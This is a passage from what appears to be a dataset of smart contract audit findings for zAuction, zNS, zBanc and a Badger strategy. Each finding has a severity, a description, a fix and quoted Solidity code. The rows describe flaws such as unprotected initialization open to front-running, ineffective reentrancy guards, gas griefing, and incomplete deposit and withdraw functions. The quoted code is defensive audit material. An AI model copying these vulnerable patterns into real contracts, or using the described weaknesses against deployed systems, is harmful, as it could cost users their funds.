\\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n\\nThis method can only be called by the strategist because of the `onlyStrategist` modifier.\\nThis method has a few steps which take one asset and transform it into another asset a few times.\\nIt first claims the Badger tokens:\\n```\\n// 1. Harvest from Badger Tree\\nIBadgerTree(BADGER\\_TREE).claim(\\_tokens, \\_cumulativeAmounts, \\_index, \\_cycle, \\_merkleProof, \\_amountsToClaim);\\n```\\n\\nThen it transforms the Badger tokens into WBTC using Uniswap.\\n```\\n// 2. Sushi: Badger --> WBTC\\nuint256 \\_badger = IERC20Upgradeable(BADGER).balanceOf(address(this));\\nif (\\_badger > 0) {\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, 0);\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, \\_badger);\\n\\n address[] memory \\_path = new address[](2);\\n \\_path[0] = BADGER;\\n \\_path[1] = WBTC;\\n\\n IUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n}\\n```\\n\\nThis step can be simplified in two ways.\\nFirst, the `safeApprove` method isn't useful because its usage is not recommended anymore.\\nThe OpenZeppelin version 4 implementation states the method is deprecated and its usage is discouraged.\\n```\\n\\* @dev Deprecated. This function has issues similar to the ones found in\\n\\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\n```\\n \\* @dev Deprecated. This function has issues similar to the ones found in\\n \\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\nAnother step is swapping the tokens on Uniswap.\\n```\\nIUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n```\\n\\nIn this case, the last argument `block.timestamp.add(1800)` is the deadline. This is useful when the transaction is sent to the network and a deadline is needed to expire the transaction. However, the execution is right now and there's no need for a future expiration date.\\nRemoving the safe math addition will have the same end effect, the tokens will be swapped and the call is not at risk to expire.",Resolution\\nComment from NUTS Finance team:\\nWe have replaced all safeApprove() usage with approve() and used block.timestamp as the expiration date.\\nDo not use safe math when sending the expiration date. Use `block.timestamp` for the same effect and a reduced gas cost.\\nApply the same principles for other Single Plus Tokens.,,"```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n" +Reduce complexity in modifiers related to governance and strategist,low,"The modifier onlyGovernance:\\n```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\nCalls the internal function _checkGovernance:\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, ""not governance"");\\n}\\n```\\n\\nThere is no other case where the internal method `_checkGovernance` is called directly.\\nOne can reduce complexity by removing the internal function and moving its code directly in the modifier. This will increase code size but reduce gas used and code complexity.\\nThere are multiple similar instances:\\n```\\nfunction \\_checkStrategist() internal view {\\n require(msg.sender == governance || strategists[msg.sender], ""not strategist"");\\n}\\n\\nmodifier onlyStrategist {\\n \\_checkStrategist();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, ""not governance"");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == IGaugeController(controller).governance(), ""not governance"");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n",Consider removing the internal function and including its body in the modifier directly if the code size is not an issue.,,```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n +zAuction - incomplete / dead code zWithdraw and zDeposit,high,"The code generally does not appear to be production-ready. The methods `zWithdraw` and `zDeposit` do not appear to be properly implemented. `zWithdraw` rather burns `ETH` balance than withdrawing it for an account (missing transfer) and `zDeposit` manipulates an accounts balance but never receives the `ETH` amount it credits to an account.\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\n",Resolution\\nobsolete with changes from zer0-os/[email protected]135b2aa removing the `zAccountAccountant`.\\nThe methods do not seem to be used by the zAuction contract. It is highly discouraged from shipping incomplete implementations in productive code. Remove dead/unreachable code. Fix the implementations to perform proper accounting before reintroducing them if they are called by zAuction.,,"```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\n" +zAuction - Unpredictable behavior for users due to admin front running or general bad timing,high,"An administrator of `zAuctionAccountant` contract can update the `zAuction` contract without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nupdating the `zAuction` takes effect immediately. This has the potential to fail acceptance of bids by sellers on the now outdated `zAuction` contract as interaction with the accountant contract is now rejected. This forces bidders to reissue their bids in order for the seller to be able to accept them using the Accountant contract. This may also be used by admins to selectively censor the acceptance of accountant based bids by changing the active `zAuction` address.\\n```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n\\nUpgradeable contracts may introduce the same unpredictability issues where the proxyUpgradeable owner may divert execution to a new zNS registrar implementation selectively for certain transactions or without prior notice to users.","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nValidate arguments before updating contract addresses (at least != current/0x0). Consider implementing a 2-step admin ownership transfer (transfer+accept) to avoid losing control of the contract by providing the wrong `ETH` address.",,"```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n" +"zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclear",high,"The lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. The new owner can now force to sell the asset even though it's might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise and old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-runned by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n","Consider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\n",,"```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n" +zAuction - pot. initialization fronrunning and unnecessary init function,medium,"The `zAuction` initialization method is unprotected and while only being executable once, can be called by anyone. This might allow someone to monitor the mempool for new deployments of this contract and fron-run the initialization to initialize it with different parameters.\\nA mitigating factor is that this condition can be detected by the deployer as subsequent calls to `init()` will fail.\\nNote: this doesn't adhere to common interface naming convention/oz naming convention where this method would be called `initialize`.\\nNote: that zNS in contrast relies on ou/initializable pattern with proper naming.\\nNote: that this function might not be necessary at all and should be replaced by a constructor instead, as the contract is not used with a proxy pattern.\\n```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\n","The contract is not used in a proxy pattern, hence, the initialization should be performed in the `constructor` instead.",,```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\n +zAuction - unclear upgrade path,medium,`zAuction` appears to implement an upgrade path for the auction system via `zAuctionAccountant`. `zAuction` itself does not hold any value. The `zAuctionAccountant` can be configured to allow only one `zAution` contract to interact with it. The update of the contract reference takes effect immediately (https://github.com/ConsenSys/zer0-zauction-audit-2021-05/issues/7).\\nAcceptance of bids via the accountant on the old contract immediately fail after an admin updates the referenced `zAuction` contract while `WETH` bids may still continue. This may create an unfavorable scenario where two contracts may be active in parallel accepting `WETH` bids.\\nIt should also be noted that 2nd layer bids (signed data) using the accountant for the old contract will not be acceptable anymore.\\n```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\n,Consider re-thinking the upgrade path. Avoid keeping multiple versions of the auction contact active.,,```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\n +"zAuction, zNS - gas griefing by spamming offchain fake bids Acknowledged",medium,"The execution status of both `zAuction.acceptBid` and `StakingController.fulfillDomainBid` transactions depend on the bidder, as his approval is needed, his signature is being validated, etc. However, these transactions can be submitted by accounts that are different from the bidder account, or for accounts that do not have the required funds/deposits available, luring the account that has to perform the on-chain call into spending gas on a transaction that is deemed to fail (gas griefing). E.g. posting high-value fake bids for zAuction without having funds deposited or `WETH` approved.\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n",Revert early for checks that depend on the bidder before performing gas-intensive computations.\\nConsider adding a dry-run validation for off-chain components before transaction submission.,,"```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n" +zAuction - hardcoded ropsten token address,low,The auction contract hardcodes the WETH ERC20 token address. this address will not be functional when deploying to mainnet.\\n```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\n,Resolution\\nAddressed with zer0-os/[email protected]135b2aa and the following statement:\\n5.30 weth address in constructor\\nNote: does not perform input validation as recommended\\nConsider taking the used `WETH` token address as a constructor argument. Avoid code changes to facilitate testing! Perform input validation on arguments rejecting `address(0x0)` to facilitate the detection of potential misconfiguration in the deployment pipeline.,,```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\n +zAuction - accountant allows zero value withdrawals/deposits/exchange,low,"Zero value transfers effectively perform a no-operation sometimes followed by calling out to the recipient of the withdrawal.\\nA transfer where `from==to` or where the value is `0` is ineffective.\\n```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction Deposit() external payable {\\n ethbalance[msg.sender] = SafeMath.add(ethbalance[msg.sender], msg.value);\\n emit Deposited(msg.sender, msg.value);\\n}\\n```\\n\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n\\n function Exchange(address from, address to, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n ethbalance[to] = SafeMath.add(ethbalance[to], amount);\\n emit zExchanged(from, to, amount);\\n }\\n```\\n",Consider rejecting ineffective withdrawals (zero value) or at least avoid issuing a zero value `ETH` transfers. Avoid emitting successful events for ineffective calls to not trigger 3rd party components on noop's.,,"```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n" +zAuction - seller should not be able to accept their own bid,low,"A seller can accept their own bid which is an ineffective action that is emitting an event.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n",Disallow transfers to self.,,"```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n" +zBanc - DynamicLiquidTokenConverter ineffective reentrancy protection,high,"`reduceWeight` calls `_protected()` in an attempt to protect from reentrant calls but this check is insufficient as it will only check for the `locked` statevar but never set it. A potential for direct reentrancy might be present when an erc-777 token is used as reserve.\\nIt is assumed that the developer actually wanted to use the `protected` modifier that sets the lock before continuing with the method.\\n```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n\\n```\\ncontract ReentrancyGuard {\\n // true while protected code is being executed, false otherwise\\n bool private locked = false;\\n\\n /\\*\\*\\n \\* @dev ensures instantiation only by sub-contracts\\n \\*/\\n constructor() internal {}\\n\\n // protects a function against reentrancy attacks\\n modifier protected() {\\n \\_protected();\\n locked = true;\\n \\_;\\n locked = false;\\n }\\n\\n // error message binary size optimization\\n function \\_protected() internal view {\\n require(!locked, ""ERR\\_REENTRANCY"");\\n }\\n}\\n```\\n",To mitigate potential attack vectors from reentrant calls remove the call to `_protected()` and decorate the function with `protected` instead. This will properly set the lock before executing the function body rejecting reentrant calls.,,```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n +zBanc - DynamicLiquidTokenConverter input validation,medium,"Check that the value in `PPM` is within expected bounds before updating system settings that may lead to functionality not working correctly. For example, setting out-of-bounds values for `stepWeight` or `setMinimumWeight` may make calls to `reduceWeight` fail. These values are usually set in the beginning of the lifecycle of the contract and misconfiguration may stay unnoticed until trying to reduce the weights. The settings can be fixed, however, by setting the contract inactive and updating it with valid settings. Setting the contract to inactive may temporarily interrupt the normal operation of the contract which may be unfavorable.\\nBoth functions allow the full `uint32` range to be used, which, interpreted as `PPM` would range from `0%` to `4.294,967295%`\\n```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, ""Min weight 0"");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n\\n```\\nfunction setStepWeight(uint32 \\_stepWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_stepWeight > 0, ""Step weight 0"");\\n //\\_validReserveWeight(\\_stepWeight);\\n stepWeight = \\_stepWeight;\\n emit StepWeightUpdated(\\_stepWeight);\\n}\\n```\\n","Reintroduce the checks for `_validReserveWeight` to check that a percent value denoted in `PPM` is within valid bounds `_weight > 0 && _weight <= PPM_RESOLUTION`. There is no need to separately check for the value to be `>0` as this is already ensured by `_validReserveWeight`.\\nNote that there is still room for misconfiguration (step size too high, min-step too high), however, this would at least allow to catch obviously wrong and often erroneously passed parameters early.",,"```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, ""Min weight 0"");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n" +zBanc - DynamicLiquidTokenConverter introduces breaking changes to the underlying bancorprotocol base,medium,"Introducing major changes to the complex underlying smart contract system that zBanc was forked from(bancorprotocol) may result in unnecessary complexity to be added. Complexity usually increases the attack surface and potentially introduces software misbehavior. Therefore, it is recommended to focus on reducing the changes to the base system as much as possible and comply with the interfaces and processes of the system instead of introducing diverging behavior.\\nFor example, `DynamicLiquidTokenConverterFactory` does not implement the `ITypedConverterFactory` while other converters do. Furthermore, this interface and the behavior may be expected to only perform certain tasks e.g. when called during an upgrade process. Not adhering to the base systems expectations may result in parts of the system failing to function for the new convertertype. Changes introduced to accommodate the custom behavior/interfaces may result in parts of the system failing to operate with existing converters. This risk is best to be avoided.\\nIn the case of `DynamicLiquidTokenConverterFactory` the interface is imported but not implemented at all (unused import). The reason for this is likely because the function `createConverter` in `DynamicLiquidTokenConverterFactory` does not adhere to the bancor-provided interface anymore as it is doing way more than “just” creating and returning a new converter. This can create problems when trying to upgrade the converter as the upgraded expected the shared interface to be exposed unless the update mechanisms are modified as well.\\nIn general, the factories `createConverter` method appears to perform more tasks than comparable type factories. It is questionable if this is needed but may be required by the design of the system. We would, however, highly recommend to not diverge from how other converters are instantiated unless it is required to provide additional security guarantees (i.e. the token was instantiated by the factory and is therefore trusted).\\nThe `ConverterUpgrader` changed in a way that it now can only work with the `DynamicLiquidTokenconverter` instead of the more generalized `IConverter` interface. This probably breaks the update for all other converter types in the system.\\nThe severity is estimated to be medium based on the fact that the development team seems to be aware of the breaking changes but the direction of the design of the system was not yet decided.\\nunused import\\nconverterType should be external as it is not called from within the same or inherited contracts\\n```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n\\ncreateToken can be external and is actually creating a token and converter that is using that token (the converter is not returned)(consider renaming to createTokenAndConverter)\\n```\\n{\\n DSToken token = new DSToken(\\_name, \\_symbol, \\_decimals);\\n\\n token.issue(msg.sender, \\_initialSupply);\\n\\n emit NewToken(token);\\n\\n createConverter(\\n token,\\n \\_reserveToken,\\n \\_reserveWeight,\\n \\_reserveBalance,\\n \\_registry,\\n \\_maxConversionFee,\\n \\_minimumWeight,\\n \\_stepWeight,\\n \\_marketCapThreshold\\n );\\n\\n return token;\\n}\\n```\\n\\nthe upgrade interface changed and now requires the converter to be a `DynamicLiquidTokenConverter`. Other converters may potentially fail to upgrade unless they implement the called interfaces.\\n```\\n function upgradeOld(DynamicLiquidTokenConverter \\_converter, bytes32 \\_version) public {\\n \\_version;\\n DynamicLiquidTokenConverter converter = DynamicLiquidTokenConverter(\\_converter);\\n address prevOwner = converter.owner();\\n acceptConverterOwnership(converter);\\n DynamicLiquidTokenConverter newConverter = createConverter(converter);\\n \\n copyReserves(converter, newConverter);\\n copyConversionFee(converter, newConverter);\\n transferReserveBalances(converter, newConverter);\\n IConverterAnchor anchor = converter.token();\\n \\n // get the activation status before it's being invalidated\\n bool activate = isV28OrHigherConverter(converter) && converter.isActive();\\n \\n if (anchor.owner() == address(converter)) {\\n converter.transferTokenOwnership(address(newConverter));\\n newConverter.acceptAnchorOwnership();\\n }\\n\\n handleTypeSpecificData(converter, newConverter, activate);\\n converter.transferOwnership(prevOwner);\\n \\n newConverter.transferOwnership(prevOwner);\\n \\n emit ConverterUpgrade(address(converter), address(newConverter));\\n }\\n```\\n\\n```\\nfunction upgradeOld(\\n IConverter \\_converter,\\n bytes32 /\\* \\_version \\*/\\n) public {\\n // the upgrader doesn't require the version for older converters\\n upgrade(\\_converter, 0);\\n}\\n```\\n","It is a fundamental design decision to either follow the bancorsystems converter API or diverge into a more customized system with a different design, functionality, or even security assumptions. From the current documentation, it is unclear which way the development team wants to go.\\nHowever, we highly recommend re-evaluating whether the newly introduced type and components should comply with the bancor API (recommended; avoid unnecessary changes to the underlying system,) instead of changing the API for the new components. Decide if the new factory should adhere to the usually commonly shared `ITypedConverterFactory` (recommended) and if not, remove the import and provide a new custom shared interface. It is highly recommended to comply and use the bancor systems extensibility mechanisms as intended, keeping the previously audited bancor code in-tact and voiding unnecessary re-assessments of the security impact of changes.",,```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n +zBanc - DynamicLiquidTokenConverter isActive should only be returned if converter is fully configured and converter parameters should only be updateable while converter is inactive,medium,"By default, a converter is `active` once the anchor ownership was transferred. This is true for converters that do not require to be properly set up with additional parameters before they can be used.\\n```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n\\nFor a simple converter, this might be sufficient. If a converter requires additional setup steps (e.g. setting certain internal variables, an oracle, limits, etc.) it should return `inactive` until the setup completes. This is to avoid that users are interacting with (or even pot. frontrunning) a partially configured converter as this may have unexpected outcomes.\\nFor example, the `LiquidityPoolV2Converter` overrides the `isActive` method to require additional variables be set (oracle) to actually be in `active` state.\\n```\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view override returns (bool) {\\n return super.isActive() && address(priceOracle) != address(0);\\n}\\n```\\n\\nAdditionally, settings can only be updated while the contract is `inactive` which will be the case during an upgrade. This ensures that the `owner` cannot adjust settings at will for an active contract.\\n```\\nfunction activate(\\n IERC20Token \\_primaryReserveToken,\\n IChainlinkPriceOracle \\_primaryReserveOracle,\\n IChainlinkPriceOracle \\_secondaryReserveOracle)\\n public\\n inactive\\n ownerOnly\\n validReserve(\\_primaryReserveToken)\\n notThis(address(\\_primaryReserveOracle))\\n notThis(address(\\_secondaryReserveOracle))\\n validAddress(address(\\_primaryReserveOracle))\\n validAddress(address(\\_secondaryReserveOracle))\\n{\\n```\\n\\nThe `DynamicLiquidTokenConverter` is following a different approach. It inherits the default `isActive` which sets the contract active right after anchor ownership is transferred. This kind of breaks the upgrade process for `DynamicLiquidTokenConverter` as settings cannot be updated while the contract is active (as anchor 